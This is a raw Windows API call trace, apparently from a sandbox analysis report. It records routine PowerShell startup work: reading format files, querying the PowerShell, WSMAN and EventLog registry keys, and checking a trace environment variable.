	[0349.396] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x60ff6213, Data2=0x934, Data3=0x43d6, Data4=([0]=0xa0, [1]=0xa7, [2]=0xa8, [3]=0x6, [4]=0x89, [5]=0x7f, [6]=0x8c, [7]=0x44))) returned 0x0
	[0349.397] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.397] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x723ca375, Data2=0x77cb, Data3=0x470d, Data4=([0]=0x91, [1]=0xb, [2]=0x1e, [3]=0x1e, [4]=0x54, [5]=0x4b, [6]=0x17, [7]=0x6b))) returned 0x0
	[0349.397] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x13085499, Data2=0x97dc, Data3=0x4b75, Data4=([0]=0xb2, [1]=0x6b, [2]=0x96, [3]=0x84, [4]=0xa2, [5]=0x56, [6]=0x62, [7]=0x72))) returned 0x0
	[0349.397] VirtualQuery (in: lpAddress=0xabeb0, lpBuffer=0xacd70, dwLength=0x30 | out: lpBuffer=0xacd70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.397] VirtualQuery (in: lpAddress=0xabeb0, lpBuffer=0xacd70, dwLength=0x30 | out: lpBuffer=0xacd70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.397] VirtualQuery (in: lpAddress=0xabeb0, lpBuffer=0xacd70, dwLength=0x30 | out: lpBuffer=0xacd70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.397] VirtualQuery (in: lpAddress=0xabeb0, lpBuffer=0xacd70, dwLength=0x30 | out: lpBuffer=0xacd70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.397] SetErrorMode (uMode=0x1) returned 0x1
	[0349.398] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0349.398] SetErrorMode (uMode=0x1) returned 0x1
	[0349.398] GetFileType (hFile=0x328) returned 0x1
	[0349.398] ReadFile (in: hFile=0x328, lpBuffer=0x3210540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x3210540*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.399] ReadFile (in: hFile=0x328, lpBuffer=0x3210540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x3210540*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.399] ReadFile (in: hFile=0x328, lpBuffer=0x3210540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x3210540*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.399] ReadFile (in: hFile=0x328, lpBuffer=0x3210540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x3210540*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.399] ReadFile (in: hFile=0x328, lpBuffer=0x3210540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x3210540*, lpNumberOfBytesRead=0xad1d8*=0x8b4, lpOverlapped=0x0) returned 1
	[0349.399] ReadFile (in: hFile=0x328, lpBuffer=0x320f95c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x320f95c*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0349.399] ReadFile (in: hFile=0x328, lpBuffer=0x3210540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x3210540*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0349.400] SetErrorMode (uMode=0x1) returned 0x1
	[0349.400] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad180 | out: lpFileInformation=0xad180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0349.400] SetErrorMode (uMode=0x1) returned 0x1
	[0349.400] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad268 | out: phkResult=0xad268*=0x328) returned 0x0
	[0349.400] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1ec, lpData=0x0, lpcbData=0xad1e8*=0x0 | out: lpType=0xad1ec*=0x1, lpData=0x0, lpcbData=0xad1e8*=0x56) returned 0x0
	[0349.400] CoTaskMemAlloc (cb=0x5a) returned 0x27d1c0
	[0349.400] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1bc, lpData=0x27d1c0, lpcbData=0xad1b8*=0x56 | out: lpType=0xad1bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad1b8*=0x56) returned 0x0
	[0349.400] CoTaskMemFree (pv=0x27d1c0) 
	[0349.401] RegCloseKey (hKey=0x328) returned 0x0
	[0349.401] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x664a2547, Data2=0x4a0, Data3=0x4e19, Data4=([0]=0xb5, [1]=0xd5, [2]=0x8e, [3]=0x34, [4]=0x35, [5]=0x77, [6]=0xe1, [7]=0xae))) returned 0x0
	[0349.401] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xcc177425, Data2=0x3260, Data3=0x465c, Data4=([0]=0x87, [1]=0x46, [2]=0x4e, [3]=0xef, [4]=0xc2, [5]=0x2d, [6]=0x29, [7]=0x12))) returned 0x0
	[0349.401] SetErrorMode (uMode=0x1) returned 0x1
	[0349.401] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0349.402] SetErrorMode (uMode=0x1) returned 0x1
	[0349.402] GetFileType (hFile=0x328) returned 0x1
	[0349.402] ReadFile (in: hFile=0x328, lpBuffer=0x324e328, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x324e328*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.403] ReadFile (in: hFile=0x328, lpBuffer=0x324e328, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x324e328*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.403] ReadFile (in: hFile=0x328, lpBuffer=0x324e328, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x324e328*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.403] ReadFile (in: hFile=0x328, lpBuffer=0x324e328, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x324e328*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.403] ReadFile (in: hFile=0x328, lpBuffer=0x324e328, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x324e328*, lpNumberOfBytesRead=0xad1d8*=0xe98, lpOverlapped=0x0) returned 1
	[0349.403] ReadFile (in: hFile=0x328, lpBuffer=0x324d928, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x324d928*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0349.403] ReadFile (in: hFile=0x328, lpBuffer=0x324e328, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x324e328*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0349.403] SetErrorMode (uMode=0x1) returned 0x1
	[0349.403] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad180 | out: lpFileInformation=0xad180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0349.403] SetErrorMode (uMode=0x1) returned 0x1
	[0349.404] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad268 | out: phkResult=0xad268*=0x328) returned 0x0
	[0349.404] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1ec, lpData=0x0, lpcbData=0xad1e8*=0x0 | out: lpType=0xad1ec*=0x1, lpData=0x0, lpcbData=0xad1e8*=0x56) returned 0x0
	[0349.404] CoTaskMemAlloc (cb=0x5a) returned 0x27d1c0
	[0349.404] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1bc, lpData=0x27d1c0, lpcbData=0xad1b8*=0x56 | out: lpType=0xad1bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad1b8*=0x56) returned 0x0
	[0349.404] CoTaskMemFree (pv=0x27d1c0) 
	[0349.404] RegCloseKey (hKey=0x328) returned 0x0
	[0349.404] VirtualQuery (in: lpAddress=0xabd00, lpBuffer=0xacbc0, dwLength=0x30 | out: lpBuffer=0xacbc0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.405] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xd9f2ff4f, Data2=0x8158, Data3=0x40cc, Data4=([0]=0xb2, [1]=0x2a, [2]=0x4, [3]=0x53, [4]=0xe0, [5]=0xbc, [6]=0x8c, [7]=0xb1))) returned 0x0
	[0349.405] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xa7ae7b35, Data2=0xf84b, Data3=0x487b, Data4=([0]=0x87, [1]=0x53, [2]=0xcb, [3]=0xd0, [4]=0xc7, [5]=0xb9, [6]=0x16, [7]=0x73))) returned 0x0
	[0350.106] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0350.106] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.106] CoTaskMemFree (pv=0x1b8da0) 
	[0350.108] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0350.108] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.108] CoTaskMemFree (pv=0x1b8da0) 
	[0350.109] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0350.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.109] CoTaskMemFree (pv=0x1b8da0) 
	[0350.111] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0350.111] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.111] CoTaskMemFree (pv=0x1b8da0) 
	[0350.417] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0350.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.417] CoTaskMemFree (pv=0x1b8da0) 
	[0350.422] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0350.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.422] CoTaskMemFree (pv=0x1b8da0) 
	[0350.422] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0350.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.422] CoTaskMemFree (pv=0x1b8da0) 
	[0350.426] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xad478 | out: phkResult=0xad478*=0x328) returned 0x0
	[0350.428] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad37c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad378, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad37c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad378*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0350.428] CoTaskMemFree (pv=0x0) 
	[0350.428] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.428] RegEnumValueW (in: hKey=0x328, dwIndex=0x0, lpValueName=0x202920, lpcchValueName=0xad428, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xad428, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0350.428] CoTaskMemFree (pv=0x202920) 
	[0350.428] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.428] RegEnumValueW (in: hKey=0x328, dwIndex=0x1, lpValueName=0x202920, lpcchValueName=0xad428, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xad428, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0350.428] CoTaskMemFree (pv=0x202920) 
	[0350.428] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.428] RegEnumValueW (in: hKey=0x328, dwIndex=0x2, lpValueName=0x202920, lpcchValueName=0xad428, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xad428, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0350.428] CoTaskMemFree (pv=0x202920) 
	[0350.429] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0xad40c, lpData=0x0, lpcbData=0xad408*=0x0 | out: lpType=0xad40c*=0x1, lpData=0x0, lpcbData=0xad408*=0x8) returned 0x0
	[0350.429] CoTaskMemAlloc (cb=0xc) returned 0x26ee80
	[0350.429] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0xad3dc, lpData=0x26ee80, lpcbData=0xad3d8*=0x8 | out: lpType=0xad3dc*=0x1, lpData="2.0", lpcbData=0xad3d8*=0x8) returned 0x0
	[0350.429] CoTaskMemFree (pv=0x26ee80) 
	[0350.840] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3c8 | out: phkResult=0xad3c8*=0x2fc) returned 0x0
	[0350.840] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad2cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad2c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad2cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad2c8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0350.840] CoTaskMemFree (pv=0x0) 
	[0350.840] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.840] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x202920, lpcchValueName=0xad378, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xad378, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0350.841] CoTaskMemFree (pv=0x202920) 
	[0350.841] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.841] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x202920, lpcchValueName=0xad378, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xad378, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0350.841] CoTaskMemFree (pv=0x202920) 
	[0350.841] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.841] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x202920, lpcchValueName=0xad378, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xad378, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0350.841] CoTaskMemFree (pv=0x202920) 
	[0350.841] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0xad35c, lpData=0x0, lpcbData=0xad358*=0x0 | out: lpType=0xad35c*=0x1, lpData=0x0, lpcbData=0xad358*=0x8) returned 0x0
	[0350.841] CoTaskMemAlloc (cb=0xc) returned 0x26ea80
	[0350.841] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0xad32c, lpData=0x26ea80, lpcbData=0xad328*=0x8 | out: lpType=0xad32c*=0x1, lpData="2.0", lpcbData=0xad328*=0x8) returned 0x0
	[0350.841] CoTaskMemFree (pv=0x26ea80) 
	[0350.842] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0350.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.842] CoTaskMemFree (pv=0x1b8da0) 
	[0350.847] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0350.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.847] CoTaskMemFree (pv=0x1b8da0) 
	[0350.852] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xad3f8 | out: phkResult=0xad3f8*=0x300) returned 0x0
	[0350.855] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad36c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad368, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad36c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad368*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0350.855] CoTaskMemFree (pv=0x0) 
	[0350.856] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.856] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x0, lpName=0x202920, lpcchName=0xad3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xad3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0350.856] CoTaskMemFree (pv=0x202920) 
	[0350.856] CoTaskMemFree (pv=0x0) 
	[0350.856] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.856] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x1, lpName=0x202920, lpcchName=0xad3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xad3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0350.856] CoTaskMemFree (pv=0x202920) 
	[0350.856] CoTaskMemFree (pv=0x0) 
	[0350.856] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.856] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x2, lpName=0x202920, lpcchName=0xad3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xad3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0350.856] CoTaskMemFree (pv=0x202920) 
	[0350.856] CoTaskMemFree (pv=0x0) 
	[0350.856] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.856] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x3, lpName=0x202920, lpcchName=0xad3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xad3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0350.856] CoTaskMemFree (pv=0x202920) 
	[0350.856] CoTaskMemFree (pv=0x0) 
	[0350.856] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.856] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x4, lpName=0x202920, lpcchName=0xad3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xad3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0350.856] CoTaskMemFree (pv=0x202920) 
	[0350.856] CoTaskMemFree (pv=0x0) 
	[0350.856] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.857] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x5, lpName=0x202920, lpcchName=0xad3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xad3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0350.857] CoTaskMemFree (pv=0x202920) 
	[0350.857] CoTaskMemFree (pv=0x0) 
	[0350.857] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.857] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x6, lpName=0x202920, lpcchName=0xad3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xad3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0350.857] CoTaskMemFree (pv=0x202920) 
	[0350.857] CoTaskMemFree (pv=0x0) 
	[0350.857] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.857] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x7, lpName=0x202920, lpcchName=0xad3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xad3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0350.857] CoTaskMemFree (pv=0x202920) 
	[0350.857] CoTaskMemFree (pv=0x0) 
	[0350.857] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0350.857] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x8, lpName=0x202920, lpcchName=0xad3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xad3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0350.857] CoTaskMemFree (pv=0x202920) 
	[0350.857] CoTaskMemFree (pv=0x0) 
	[0350.857] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x304) returned 0x0
	[0350.857] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x0) returned 0x2
	[0350.857] RegOpenKeyExW (in: hKey=0x300, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x318) returned 0x0
	[0350.857] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x0) returned 0x2
	[0350.857] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x32c) returned 0x0
	[0350.858] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x0) returned 0x2
	[0350.858] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x330) returned 0x0
	[0350.858] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x0) returned 0x2
	[0350.858] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x334) returned 0x0
	[0350.858] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x0) returned 0x2
	[0350.858] RegOpenKeyExW (in: hKey=0x300, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x338) returned 0x0
	[0350.858] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad458 | out: phkResult=0xad458*=0x0) returned 0x2
